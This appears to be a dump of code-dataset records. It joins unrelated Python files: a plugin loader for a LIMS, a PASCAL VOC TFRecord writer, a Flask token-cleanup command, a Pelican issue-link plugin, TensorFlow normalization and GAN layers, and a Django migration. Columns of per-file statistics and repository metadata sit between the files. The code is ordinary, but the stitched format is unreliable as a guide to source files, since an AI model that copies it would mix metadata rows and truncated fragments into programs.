import traceback click.echo( "Failed to load plugin %r:\n%s" % (ep.name, traceback.format_exc()), err=True) def find_all_plugins_in_scope(self): """ Yields all plugins that should be used, based on what can be found in the python environment. """ for plugin in self.find_plugins_by_entry_points(): yield plugin # Load (runtime) def load_installed(self): """ Loads all plugins that have been installed. Takes the latest PluginRegistration found for each plugin and loads it. If the plugin isn't installed anymore, or has a different version, an error is raised. """ logger.info("Loading all installed plugins") from clims.models import PluginRegistration try: installed = list(PluginRegistration.objects.all()) except ProgrammingError: # We might be loading the application before migrations have run, so the # PluginRegistration type doesn't exist. In this case we silently pass and no plugins # will be loaded return latest = dict() for current in installed: if current.name in latest \ and latest[current.name].sortable_version > current.sortable_version: logger.debug("Found registration for {} but newer already found".format(current.name_and_version)) continue logger.debug("Found a registration for {}".format(current.name_and_version)) latest[current.name] = current for plugin_registration in latest.values(): self.load(plugin_registration) self.handlers.validate() logger.info("Active handlers after loading and validating all plugins:\n{}".format( self.handlers.to_handler_config())) def load(self, plugin_registration): """ Initializes the plugin class if it's found. It must match the name and version of the PluginRegistration. """ # NOTE: We currently require plugins to load (the True flag). This is because plugins # define types that must exist after they've been created. It might be worthy to find # a way to deal with plugins that should not load anymore. 
logger.info("Loading plugin '{}@{}'".format( plugin_registration.name, plugin_registration.version)) try: plugin = self.instance_manager.add( plugin_registration.name, plugin_registration.version, True) except self.instance_manager.ImportException: # NOTE: We need to find a smooth way of getting rid of the plugin but still have # an acceptably functioning system. For now however, this error is raised # Allow the user to ignore the plugin if an environment variable is set. This # is mainly for debug purposes and to be able to run `lims shell` in this situation. if not os.environ.get("CLIMS_IGNORE_UNAVAILABLE_PLUGINS", None) == "1": ex_type, ex_value, ex_tb = sys.exc_info() six.reraise(RequiredPluginCannotLoad, "Can't import required plugin {}@{}. The plugin has been installed e.g. via " "`lims upgrade` but the implementation is not found in the python environment. " "To override this check, you can set the " "environment variable CLIMS_IGNORE_UNAVAILABLE_PLUGINS=1\n\t{}".format( plugin_registration.name, plugin_registration.version, ex_value), ex_tb) except self.instance_manager.InitializeException: six.reraise(RequiredPluginCannotLoad, "Can't initialize the plugin {}@{}. The stacktrace has more information on " "why the plugin can not load.".format( plugin_registration.name, plugin_registration.version)) # Registers handlers. 
Handlers can be defined in the submodule `handlers` or `workflows` # directly below the plugin (TODO: Allow it to be defined anywhere) for module_name in ["handlers", "workflows"]: mod = self.get_plugin_module(plugin, module_name) if not mod: logger.info("No handlers module found in plugin '{}'".format(plugin)) else: logger.info("Loading all handlers in plugin '{}'".format(plugin.get_name_and_version())) self.handlers.load_handlers(mod) def init_plugin_instance(plugin): # TODO: Call this when the plugin is run on load time (review requirements first) from sentry.plugins import bindings plugin.setup(bindings) # Register contexts from plugins if necessary if hasattr(plugin, 'get_custom_contexts'): from sentry.interfaces.contexts import contexttype for cls in plugin.get_custom_contexts() or (): contexttype(cls) if (hasattr(plugin, 'get_cron_schedule') and plugin.is_enabled()): schedules = plugin.get_cron_schedule() if schedules: settings.CELERYBEAT_SCHEDULE.update(schedules) if (hasattr(plugin, 'get_worker_imports') and plugin.is_enabled()): imports = plugin.get_worker_imports() if imports: settings.CELERY_IMPORTS += tuple(imports) if (hasattr(plugin, 'get_worker_queues') and plugin.is_enabled()): from kombu import Queue for queue in plugin.get_worker_queues(): try: name, routing_key = queue except ValueError: name = routing_key = queue q = Queue(name, routing_key=routing_key) q.durable = False settings.CELERY_QUEUES.append(q) # Query def __iter__(self): return iter(self.all()) def __len__(self): return sum(1 for i in self.all()) def all(self, version=None, enabled=None): """ :param version: The version of the plugin interface. None will return all enabled plugins. :param enabled: Specifies if only enabled plugins should be returned (True). 
If None, both enabled and disbabled plugins are returned :return: A generator that iterates over the plugins """ for plugin in sorted(self.instance_manager.all(), key=lambda x: x.get_title()): if enabled is not None and not plugin.is_enabled(): continue if version is not None and plugin.__version__ != version: continue yield plugin def exists(self, slug): for plugin in self.all(version=None): if plugin.slug == slug: return True return False def get(self, slug): for plugin in self.all(version=None): if plugin.slug == slug: return plugin raise KeyError(slug) # Legacy # These methods are pending deletion (from the sentry core) def configurable_for_project(self, project, version=1): for plugin in self.all(version=version): if not safe_execute(plugin.can_configure_for_project, project, _with_transaction=False): continue yield plugin def for_project(self, project, version=1): for plugin in self.all(version=version): if not safe_execute(plugin.is_enabled, project, _with_transaction=False): continue yield plugin def for_site(self, version=1): for plugin in self.all(version=version): if not plugin.has_site_conf(): continue yield plugin def get_registered_base_handler(self, cls): """ Returns True if cls is an implementation of a registered handler type """ for handler_type in self.handlers: if issubclass(cls, handler_type): return handler_type return None def get_plugin_module(self, plugin_class, name): """ Gets a module defined in the plugin. 
Returns None if it wasn't found """ full_module_name = '{}.{}'.format(plugin_class.__module__, name) return self._import_module(full_module_name) def _import_module(self, full_module_name): split_name = full_module_name.split('.') name = split_name[-1] try: return importlib.import_module(full_module_name) except ImportError as ex: if six.text_type(ex) != "No module named {}".format(name): trace = sys.exc_info()[2] raise ImportError("Error while trying to load plugin {}".format(full_module_name)), None, trace logger.debug("Can't find module {}".format(full_module_name)) return None def clear_handler_implementations(self, baseclass=None): if baseclass is not None: self.handlers[baseclass].clear() else: for key in self.handlers: self.handlers[key].clear() def unregister(self, cls): self.remove('%s.%s' % (cls.__module__, cls.__name__)) return cls class PluginMustHaveVersion(Exception): pass class PluginIncorrectVersionFormat(Exception): pass class RequiredPluginCannotLoad(Exception): pass
39.245823
114
0.633666
1,985
16,444
5.093703
0.209068
0.015132
0.012462
0.008901
0.146375
0.090891
0.072495
0.05044
0.042528
0.032539
0
0.002479
0.288555
16,444
418
115
39.339713
0.861783
0.09505
0
0.173554
0
0
0.107164
0.006005
0
0
0
0.007177
0
0
null
null
0.012397
0.140496
null
null
0.004132
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
bd9a2a22106cfdf6f802047a7e11b687baf754c4
4,522
py
Python
datasets/pasval_voc_writer.py
jiabaocui/SEGS
c03d3bcb6fdcc4e6e6e13767bed8eae754beb726
[ "MIT" ]
null
null
null
datasets/pasval_voc_writer.py
jiabaocui/SEGS
c03d3bcb6fdcc4e6e6e13767bed8eae754beb726
[ "MIT" ]
null
null
null
datasets/pasval_voc_writer.py
jiabaocui/SEGS
c03d3bcb6fdcc4e6e6e13767bed8eae754beb726
[ "MIT" ]
null
null
null
import os import random import xml.etree.ElementTree as ET import tensorflow as tf def int64_feature(value): """Wrapper for inserting int64 features into Example proto. """ if not isinstance(value, list): value = [value] return tf.train.Feature(int64_list=tf.train.Int64List(value=value)) def float_feature(value): """Wrapper for inserting float features into Example proto. """ if not isinstance(value, list): value = [value] return tf.train.Feature(float_list=tf.train.FloatList(value=value)) def bytes_feature(value): """Wrapper for inserting bytes features into Example proto. """ if not isinstance(value, list): value = [value] return tf.train.Feature(bytes_list=tf.train.BytesList(value=value)) DEFUALT_PATHS = { 'images': '/mnt/disk/chenyifeng/VOC2012/JPEGImages', 'annotations': '/mnt/disk/chenyifeng/VOC2012/Annotations', 'segmentations': '/mnt/disk/chenyifeng/VOC2012/SegmentationClassAug' } class PascalVocWriter: """ PASCAL VOC 2012 DataSet to TF record Writer """ def __init__(self, paths=DEFUALT_PATHS): self.img_path = paths['images'] self.ano_path = paths['annotations'] self.sgm_path = paths['segmentations'] def convert_to_example(self, file_name): img_path = os.path.join(self.img_path, file_name + '.jpg') ano_path = os.path.join(self.ano_path, file_name + '.xml') sgm_path = os.path.join(self.sgm_path, file_name + '.png') img_data = tf.gfile.FastGFile(img_path, 'rb').read() sgm_data = tf.gfile.FastGFile(sgm_path, 'rb').read() # img_data = imread(img_path).tostring() # sgm_data = imread(sgm_path).tostring() anno_tree = ET.parse(ano_path) anno_root = anno_tree.getroot() # is_sgmt = int(anno_root.find('segmented').text) # if is_sgmt == 0: # print('{} is not a Segmentation Sample. 
So Skipped'.format(file_name)) size = anno_root.find('size') shape = [int(size.find('height').text), int(size.find('width').text), int(size.find('depth').text)] image_format = b'JPEG' segment_format = b'PNG' example = tf.train.Example( features=tf.train.Features( feature={ 'image/name':bytes_feature(file_name.encode()), 'image/height': int64_feature(shape[0]), 'image/width': int64_feature(shape[1]), 'image/channels': int64_feature(shape[2]), 'image/shape': int64_feature(shape), 'image/format': bytes_feature(image_format), 'image/encoded': bytes_feature(img_data), 'label/format': bytes_feature(segment_format), 'label/encoded': bytes_feature(sgm_data) } ) ) return example def add_to_record(self, file_name, tfrecord_writer): example = self.convert_to_example(file_name) tfrecord_writer.write(example.SerializeToString()) def run(self, pic_names, output_dir, shuffling=False, size=300): if shuffling: random.seed(1314) random.shuffle(pic_names) total_num = len(pic_names) for start in range(0, total_num, size): tf_filename = '%s/%03d.tfrecord' % (output_dir, start // size) tf_recorder = tf.python_io.TFRecordWriter(tf_filename) print('=>' * (start * 5 // total_num) + '{:.0f}% Finished'.format(start / total_num * 100)) for pic_idx in range(start, min(start + 300, total_num)): pic_name = pic_names[pic_idx] self.add_to_record(pic_name, tf_recorder) print('=>' * 5 + '{:.0f}% Finished'.format(100)) def convert_val(): writer = PascalVocWriter() pic_names = open('/mnt/disk/chenyifeng/VOC2012/ImageSets/Segmentation/val.txt').readlines() pic_names = [i.strip(' \n') for i in pic_names] writer.run(pic_names, output_dir='/mnt/disk/chenyifeng/VOC2012/tf_segments/tf_records/val') def convert_train(): writer = PascalVocWriter() pic_names = open('/mnt/disk/chenyifeng/VOC2012/ImageSets/Segmentation/train.txt').readlines() pic_names = [i.strip(' \n') for i in pic_names] writer.run(pic_names, output_dir='/mnt/disk/chenyifeng/VOC2012/tf_segments/tf_records/train') if __name__ == '__main__': # 
convert_train() convert_val()
34.784615
103
0.623176
558
4,522
4.842294
0.268817
0.035529
0.044041
0.062176
0.280163
0.225759
0.225759
0.225759
0.225759
0.225759
0
0.021981
0.245467
4,522
129
104
35.054264
0.76993
0.102609
0
0.119048
0
0
0.158537
0.089597
0
0
0
0
0
1
0.107143
false
0
0.047619
0
0.214286
0.02381
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd9b25df86c49c5c34262d4d2399058530c129b1
296
py
Python
backend/commands/remove_expired_tokens.py
KSodowska/codeforpoznan.pl_v3
ddb079db90eda869940f4467832ef96f70591055
[ "MIT" ]
8
2019-08-12T22:10:48.000Z
2020-09-13T17:46:10.000Z
backend/commands/remove_expired_tokens.py
KSodowska/codeforpoznan.pl_v3
ddb079db90eda869940f4467832ef96f70591055
[ "MIT" ]
326
2018-11-07T20:29:28.000Z
2022-02-10T08:53:42.000Z
backend/commands/remove_expired_tokens.py
KSodowska/codeforpoznan.pl_v3
ddb079db90eda869940f4467832ef96f70591055
[ "MIT" ]
49
2018-11-14T17:50:27.000Z
2021-04-20T22:40:29.000Z
import click from flask.cli import with_appcontext from backend.models import JWTToken @click.command() @with_appcontext def remove_expired_tokens(): """Remove expired tokens from database.""" click.echo("Removing expired tokens") JWTToken.remove_expired() click.echo("Done!")
21.142857
46
0.75
37
296
5.864865
0.513514
0.179724
0.175115
0
0
0
0
0
0
0
0
0
0.14527
296
13
47
22.769231
0.857708
0.121622
0
0
0
0
0.110236
0
0
0
0
0
0
1
0.111111
true
0
0.333333
0
0.444444
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
2
bd9b69dd642e70dfb29c6adbdfeea6b8fd4c082f
200
py
Python
tests/cases/examples/skip_track/gen_playlist.py
aarongaut/nextsong
05639d3aba2ef31721fd2533ca804a0d32e64ebf
[ "MIT" ]
null
null
null
tests/cases/examples/skip_track/gen_playlist.py
aarongaut/nextsong
05639d3aba2ef31721fd2533ca804a0d32e64ebf
[ "MIT" ]
null
null
null
tests/cases/examples/skip_track/gen_playlist.py
aarongaut/nextsong
05639d3aba2ef31721fd2533ca804a0d32e64ebf
[ "MIT" ]
null
null
null
from nextsong import Playlist as p p( "01.mp3", p( p("02.mp3", weight=1 / 4), p(weight=3 / 4), count=1, ), "03.mp3", "04.mp3", loop=True, ).save_xml()
14.285714
34
0.455
30
200
3
0.666667
0.044444
0
0
0
0
0
0
0
0
0
0.131783
0.355
200
13
35
15.384615
0.565891
0
0
0.166667
0
0
0.12
0
0
0
0
0
0
1
0
true
0
0.083333
0
0.083333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
1
bd9ca71b402899675dbdc36257c37a8b3b2984d6
861
py
Python
pelican/plugins/issues/__init__.py
GlowstoneMC/glowstonemc.github.io
1d1a453251816ef90fb8aaa63a689c81aaad4848
[ "Artistic-2.0" ]
6
2016-07-30T00:44:10.000Z
2021-07-09T02:24:36.000Z
pelican/plugins/issues/__init__.py
GlowstoneMC/glowstonemc.github.io
1d1a453251816ef90fb8aaa63a689c81aaad4848
[ "Artistic-2.0" ]
16
2016-07-30T01:01:30.000Z
2021-07-09T21:33:51.000Z
pelican/plugins/issues/__init__.py
GlowstoneMC/glowstonemc.github.io
1d1a453251816ef90fb8aaa63a689c81aaad4848
[ "Artistic-2.0" ]
10
2015-01-21T19:57:43.000Z
2017-09-01T22:15:21.000Z
import itertools import re from pelican import signals ISSUE_REGEX = re.compile(r"([\s(])(#[\d]+)([\s),.])") ISSUE_URL = "https://github.com/GlowstoneMC/Glowstone/issues/{}" ISSUE_HTML = """{}<a href="{}">{}</a>{}""" def process_content(article): done_tags = set() for start, tag, end in ISSUE_REGEX.findall(article._content): if tag in done_tags: continue done_tags.add(tag) num = tag[1:] article._content = article._content.replace( "{}{}{}".format(start, tag, end), ISSUE_HTML.format(start, ISSUE_URL.format(num), tag, end), ) def get_issue_links(generator): blog = itertools.chain(generator.articles, generator.drafts) for article in blog: process_content(article) def register(): signals.article_generator_finalized.connect(get_issue_links)
24.6
70
0.637631
107
861
4.943925
0.485981
0.079395
0.079395
0
0
0
0
0
0
0
0
0.001464
0.206736
861
34
71
25.323529
0.77306
0
0
0
0
0
0.119628
0.027875
0
0
0
0
0
1
0.130435
false
0
0.130435
0
0.26087
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd9d44c68b6bd8ea2a3e03df9da24659e42178bb
17,295
py
Python
athena/layers/commons.py
iou2much/athena
156dfceb0267e8c105e5d040aac017e2d8b9ad9d
[ "Apache-2.0" ]
null
null
null
athena/layers/commons.py
iou2much/athena
156dfceb0267e8c105e5d040aac017e2d8b9ad9d
[ "Apache-2.0" ]
null
null
null
athena/layers/commons.py
iou2much/athena
156dfceb0267e8c105e5d040aac017e2d8b9ad9d
[ "Apache-2.0" ]
null
null
null
# coding=utf-8 # Copyright (C) 2019 ATHENA AUTHORS; Xiangang Li # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # pylint: disable=too-few-public-methods, invalid-name # pylint: disable=no-self-use, missing-function-docstring """Utils for common layers.""" import tensorflow as tf from athena.layers.functional import make_positional_encoding, collapse4d, gelu from athena.layers.functional import splice from athena.utils.misc import gated_linear_layer class PositionalEncoding(tf.keras.layers.Layer): """positional encoding can be used in transformer""" def __init__(self, d_model, max_position=800, scale=False): super().__init__() self.d_model = d_model self.scale = scale self.pos_encoding = make_positional_encoding(max_position, d_model) def call(self, x): """ call function """ seq_len = tf.shape(x)[1] if self.scale: x *= tf.math.sqrt(tf.cast(self.d_model, tf.float32)) x += self.pos_encoding[:, :seq_len, :] return x class ScaledPositionalEncoding(PositionalEncoding): """scaled positional encoding, reference: https://arxiv.org/pdf/1809.08895.pdf""" def __init__(self, d_model, max_position=800): super().__init__(d_model, max_position, scale=False) def build(self, _): self.alpha = self.add_weight( name="alpha", initializer=tf.keras.initializers.constant(1) ) def call(self, x): seq_len = tf.shape(x)[1] x += self.alpha * self.pos_encoding[:, :seq_len, :] return x class Collapse4D(tf.keras.layers.Layer): 
"""collapse4d can be used in cnn-lstm for speech processing reshape from [N T D C] -> [N T D*C] """ def call(self, x): return collapse4d(x) class Gelu(tf.keras.layers.Layer): """Gaussian Error Linear Unit. This is a smoother version of the RELU. Original paper: https://arxiv.org/abs/1606.08415 Args: x: float Tensor to perform activation. Returns: x: with the GELU activation applied. """ def call(self, x): return gelu(x) class TdnnLayer(tf.keras.layers.Layer): """An implementation of Tdnn Layer Args: context: a int of left and right context, or a list of context indexes, e.g. (-2, 0, 2). output_dim: the dim of the linear transform """ def __init__(self, context, output_dim, use_bias=False, **kwargs): super().__init__(**kwargs) if hasattr(context, "__iter__"): self.context_size = len(context) self.context_list = context else: self.context_size = context * 2 + 1 self.context_list = range(-context, context + 1) self.output_dim = output_dim self.linear = tf.keras.layers.Dense(output_dim, use_bias=use_bias) def call(self, x, training=None, mask=None): x = splice(x, self.context_list) x = self.linear(x, training=training, mask=mask) return x class GroupNormalization(tf.keras.layers.Layer): def __init__( self, groups: int = 2, axis: int = -1, epsilon: float = 1e-3, center: bool = True, scale: bool = True, beta_initializer = "zeros", gamma_initializer = "ones", beta_regularizer = None, gamma_regularizer = None, beta_constraint = None, gamma_constraint = None, **kwargs ): super().__init__(**kwargs) self.supports_masking = True self.groups = groups self.axis = axis self.epsilon = epsilon self.center = center self.scale = scale self.beta_initializer = tf.keras.initializers.get(beta_initializer) self.gamma_initializer = tf.keras.initializers.get(gamma_initializer) self.beta_regularizer = tf.keras.regularizers.get(beta_regularizer) self.gamma_regularizer = tf.keras.regularizers.get(gamma_regularizer) self.beta_constraint = tf.keras.constraints.get(beta_constraint) 
self.gamma_constraint = tf.keras.constraints.get(gamma_constraint) self._check_axis() def build(self, input_shape): self._check_if_input_shape_is_none(input_shape) self._set_number_of_groups_for_instance_norm(input_shape) self._check_size_of_dimensions(input_shape) self._create_input_spec(input_shape) self._add_gamma_weight(input_shape) self._add_beta_weight(input_shape) self.built = True super().build(input_shape) def call(self, inputs): input_shape = tf.keras.backend.int_shape(inputs) tensor_input_shape = tf.shape(inputs) reshaped_inputs, group_shape = self._reshape_into_groups( inputs, input_shape, tensor_input_shape ) normalized_inputs = self._apply_normalization(reshaped_inputs, input_shape) outputs = tf.reshape(normalized_inputs, tensor_input_shape) return outputs def get_config(self): config = { "groups": self.groups, "axis": self.axis, "epsilon": self.epsilon, "center": self.center, "scale": self.scale, "beta_initializer": tf.keras.initializers.serialize(self.beta_initializer), "gamma_initializer": tf.keras.initializers.serialize( self.gamma_initializer ), "beta_regularizer": tf.keras.regularizers.serialize(self.beta_regularizer), "gamma_regularizer": tf.keras.regularizers.serialize( self.gamma_regularizer ), "beta_constraint": tf.keras.constraints.serialize(self.beta_constraint), "gamma_constraint": tf.keras.constraints.serialize(self.gamma_constraint), } base_config = super().get_config() return {**base_config, **config} def compute_output_shape(self, input_shape): return input_shape def _reshape_into_groups(self, inputs, input_shape, tensor_input_shape): group_shape = [tensor_input_shape[i] for i in range(len(input_shape))] group_shape[self.axis] = input_shape[self.axis] // self.groups group_shape.insert(self.axis, self.groups) group_shape = tf.stack(group_shape) reshaped_inputs = tf.reshape(inputs, group_shape) return reshaped_inputs, group_shape def _apply_normalization(self, reshaped_inputs, input_shape): group_shape = 
tf.keras.backend.int_shape(reshaped_inputs) group_reduction_axes = list(range(1, len(group_shape))) axis = -2 if self.axis == -1 else self.axis - 1 group_reduction_axes.pop(axis) mean, variance = tf.nn.moments( reshaped_inputs, group_reduction_axes, keepdims=True ) gamma, beta = self._get_reshaped_weights(input_shape) normalized_inputs = tf.nn.batch_normalization( reshaped_inputs, mean=mean, variance=variance, scale=gamma, offset=beta, variance_epsilon=self.epsilon, ) return normalized_inputs def _get_reshaped_weights(self, input_shape): broadcast_shape = self._create_broadcast_shape(input_shape) gamma = None beta = None if self.scale: gamma = tf.reshape(self.gamma, broadcast_shape) if self.center: beta = tf.reshape(self.beta, broadcast_shape) return gamma, beta def _check_if_input_shape_is_none(self, input_shape): dim = input_shape[self.axis] if dim is None: raise ValueError( "Axis " + str(self.axis) + " of " "input tensor should have a defined dimension " "but the layer received an input with shape " + str(input_shape) + "." ) def _set_number_of_groups_for_instance_norm(self, input_shape): dim = input_shape[self.axis] if self.groups == -1: self.groups = dim def _check_size_of_dimensions(self, input_shape): dim = input_shape[self.axis] if dim < self.groups: raise ValueError( "Number of groups (" + str(self.groups) + ") cannot be " "more than the number of channels (" + str(dim) + ")." ) if dim % self.groups != 0: raise ValueError( "Number of groups (" + str(self.groups) + ") must be a " "multiple of the number of channels (" + str(dim) + ")." ) def _check_axis(self): if self.axis == 0: raise ValueError( "You are trying to normalize your batch axis. 
Do you want to " "use tf.layer.batch_normalization instead" ) def _create_input_spec(self, input_shape): dim = input_shape[self.axis] self.input_spec = tf.keras.layers.InputSpec( ndim=len(input_shape), axes={self.axis: dim} ) def _add_gamma_weight(self, input_shape): dim = input_shape[self.axis] shape = (dim,) if self.scale: self.gamma = self.add_weight( shape=shape, name="gamma", initializer=self.gamma_initializer, regularizer=self.gamma_regularizer, constraint=self.gamma_constraint, ) else: self.gamma = None def _add_beta_weight(self, input_shape): dim = input_shape[self.axis] shape = (dim,) if self.center: self.beta = self.add_weight( shape=shape, name="beta", initializer=self.beta_initializer, regularizer=self.beta_regularizer, constraint=self.beta_constraint, ) else: self.beta = None def _create_broadcast_shape(self, input_shape): broadcast_shape = [1] * len(input_shape) broadcast_shape[self.axis] = input_shape[self.axis] // self.groups broadcast_shape.insert(self.axis, self.groups) return broadcast_shape class InstanceNormalization(GroupNormalization): """Instance normalization layer. 
References - [Instance Normalization: The Missing Ingredient for Fast Stylization] (https://arxiv.org/abs/1607.08022) """ def __init__(self, **kwargs): kwargs["groups"] = -1 super().__init__(**kwargs) class DownSampleBlock(tf.keras.layers.Layer): """conv2d downsample block for stargan, instance norm is used because batch size is 1 """ def __init__(self, filters, kernel_size, strides): super(DownSampleBlock, self).__init__() self.conv1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, padding="same") self.conv2 = tf.keras.layers.Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, padding="same") self.norm1 = InstanceNormalization(epsilon=1e-8) self.norm2 = InstanceNormalization(epsilon=1e-8) def call(self, x): h1 = self.conv1(x) h1_norm = self.norm1(h1) h1_gates = self.conv2(x) h1_gates_norm = self.norm2(h1_gates) h1_glu = gated_linear_layer(inputs=h1_norm, gates=h1_gates_norm) return h1_glu class UpSampleBlock(tf.keras.layers.Layer): """conv2d upsample block for stargan, instance norm is used because batch size is 1 """ def __init__(self, filters, kernel_size, strides): super(UpSampleBlock, self).__init__() self.conv1 = tf.keras.layers.Conv2DTranspose(filters=filters, kernel_size=kernel_size, strides=strides, padding="same") self.conv2 = tf.keras.layers.Conv2DTranspose(filters=filters, kernel_size=kernel_size, strides=strides, padding="same") self.norm1 = InstanceNormalization(epsilon=1e-8) self.norm2 = InstanceNormalization(epsilon=1e-8) def call(self, x): h1 = self.conv1(x) h1_norm = self.norm1(h1) h1_gates = self.conv2(x) h1_gates_norm = self.norm2(h1_gates) h1_glu = gated_linear_layer(inputs=h1_norm, gates=h1_gates_norm) return h1_glu class ConditionalInstanceNormalisation(tf.keras.layers.Layer): """CIN Block.""" def __init__(self, in_channel): super(ConditionalInstanceNormalisation, self).__init__() self.dim_in = in_channel self.gamma = tf.keras.layers.Dense(in_channel) self.beta = 
tf.keras.layers.Dense(in_channel) def call(self, x, c): u = tf.math.reduce_mean(x, axis=1, keepdims=True) var = tf.math.reduce_mean((x - u) * (x - u), axis=1, keepdims=True) std = tf.math.sqrt(var + 1e-8) gamma = self.gamma(c) gamma = tf.reshape(gamma, [-1, 1, self.dim_in]) beta = self.beta(c) beta = tf.reshape(beta, [-1, 1, self.dim_in]) h = (x - u) / std h = h * gamma + beta return h class ResidualBlock(tf.keras.layers.Layer): """Residual Block with instance normalization.""" def __init__(self, out_channel): super(ResidualBlock, self).__init__() self.conv_1 = tf.keras.layers.Conv1D(filters=out_channel, kernel_size=3, strides=1, padding="same", use_bias=False) self.cin_1 = ConditionalInstanceNormalisation(out_channel) def call(self, x, c): x = self.conv_1(x) x = self.cin_1(x, c) x = gated_linear_layer(inputs=x, gates=x) return x class Down2d_init(tf.keras.layers.Layer): def __init__(self, filters , kernel_size, stride): super(Down2d_init, self).__init__() self.c1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=kernel_size, strides=stride, padding="same") def call(self, x): x1 = self.c1(x) x1 = gated_linear_layer(inputs=x1, gates=x1) return x1 class Down2d(tf.keras.layers.Layer): def __init__(self, filters , kernel_size, stride): super(Down2d, self).__init__() self.c1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=kernel_size, strides=stride, padding="same") self.norm1 = InstanceNormalization(epsilon=1e-8) def call(self, x): x1 = self.c1(x) x1 = self.norm1(x1) x1 = gated_linear_layer(inputs=x1, gates=x1) return x1 class Up2d(tf.keras.layers.Layer): """docstring for Up2d.""" def __init__(self, filters, kernel_size, stride): super(Up2d, self).__init__() self.c1 = tf.keras.layers.Conv2DTranspose(filters=filters, kernel_size=kernel_size, strides=stride, padding="same") self.norm1 = InstanceNormalization(epsilon=1e-8) def call(self, x): x1 = self.c1(x) x1 = self.norm1(x1) x1 = gated_linear_layer(inputs=x1, gates=x1) return x1 class 
ZoneOutCell(tf.keras.layers.LSTMCell): """Wrapper for LSTM cell to create ZoneOut Cell inspired by: https://github.com/teganmaharaj/zoneout/blob/master/zoneout_tensorflow.py Published by one of 'https://arxiv.org/pdf/1606.01305.pdf' paper writers. """ def __init__(self, zoneout_rate=0., **kwargs): super().__init__(**kwargs) self.zoneout_rate = zoneout_rate self.drop_layer = tf.keras.layers.Dropout(self.zoneout_rate) def call(self, inputs, states, training=False): """Runs vanilla LSTM Cell and applies zoneout. """ # Apply vanilla LSTM outputs, new_states = super().call(inputs, states, training=training) if self.zoneout_rate == 0: return outputs, new_states # Apply zoneout h = (1 - self.zoneout_rate) * \ self.drop_layer(new_states[0] - states[0], training=training) + \ states[0] c = (1 - self.zoneout_rate) * \ self.drop_layer(new_states[1] - states[1], training=training) + \ states[1] return outputs, [h, c] def get_config(self): config = super().get_config() config['zoneout_rate'] = self.zoneout_rate return config SUPPORTED_RNNS = { "lstm": tf.keras.layers.LSTMCell, "gru": tf.keras.layers.GRUCell, "cudnnlstm": tf.keras.layers.LSTMCell, "cudnngru": tf.keras.layers.GRUCell } ACTIVATIONS = { "relu": tf.nn.relu, "relu6": tf.nn.relu6, "elu": tf.nn.elu, "selu": tf.nn.selu, "gelu": gelu, "leaky_relu": tf.nn.leaky_relu, "sigmoid": tf.nn.sigmoid, "softplus": tf.nn.softplus, "softsign": tf.nn.softsign, "tanh": tf.nn.tanh, }
34.179842
123
0.6244
2,131
17,295
4.855936
0.169404
0.030441
0.037688
0.020874
0.38017
0.310881
0.242076
0.22845
0.200812
0.179938
0
0.015778
0.263429
17,295
505
124
34.247525
0.79653
0.122637
0
0.256484
0
0
0.041311
0.001869
0
0
0
0
0
1
0.123919
false
0
0.011527
0.008646
0.242075
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd9d5067373dbf69f5799fe7d45b1985b89fc18a
381
py
Python
tickets/migrations/0012_auto_20180830_1028.py
SpenserPorter/automate_reporting
59a0a9ff8776a7e14cd66575fc8ad7da7ec66087
[ "MIT" ]
1
2019-02-06T12:40:02.000Z
2019-02-06T12:40:02.000Z
tickets/migrations/0012_auto_20180830_1028.py
SpenserPorter/automate_reporting
59a0a9ff8776a7e14cd66575fc8ad7da7ec66087
[ "MIT" ]
null
null
null
tickets/migrations/0012_auto_20180830_1028.py
SpenserPorter/automate_reporting
59a0a9ff8776a7e14cd66575fc8ad7da7ec66087
[ "MIT" ]
null
null
null
# Generated by Django 2.1 on 2018-08-30 15:28 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('tickets', '0011_auto_20180830_0828'), ] operations = [ migrations.AlterField( model_name='ticket', name='dttm_updated', field=models.DateTimeField(), ), ]
20.052632
47
0.598425
39
381
5.717949
0.846154
0
0
0
0
0
0
0
0
0
0
0.111111
0.291339
381
18
48
21.166667
0.714815
0.112861
0
0
1
0
0.142857
0.068452
0
0
0
0
0
1
0
false
0
0.083333
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
bd9d807e7a31d0445e4cb5f019e63d43a7bf4018
12,879
py
Python
oscar/data/mars.py
IntelLabs/OSCAR
25d1dea35727379117e11b7238b5a0d1ed19acad
[ "BSD-3-Clause" ]
13
2021-02-12T18:41:53.000Z
2022-01-14T07:17:15.000Z
oscar/data/mars.py
IntelLabs/OSCAR
25d1dea35727379117e11b7238b5a0d1ed19acad
[ "BSD-3-Clause" ]
null
null
null
oscar/data/mars.py
IntelLabs/OSCAR
25d1dea35727379117e11b7238b5a0d1ed19acad
[ "BSD-3-Clause" ]
2
2021-03-05T18:27:23.000Z
2021-03-05T23:16:09.000Z
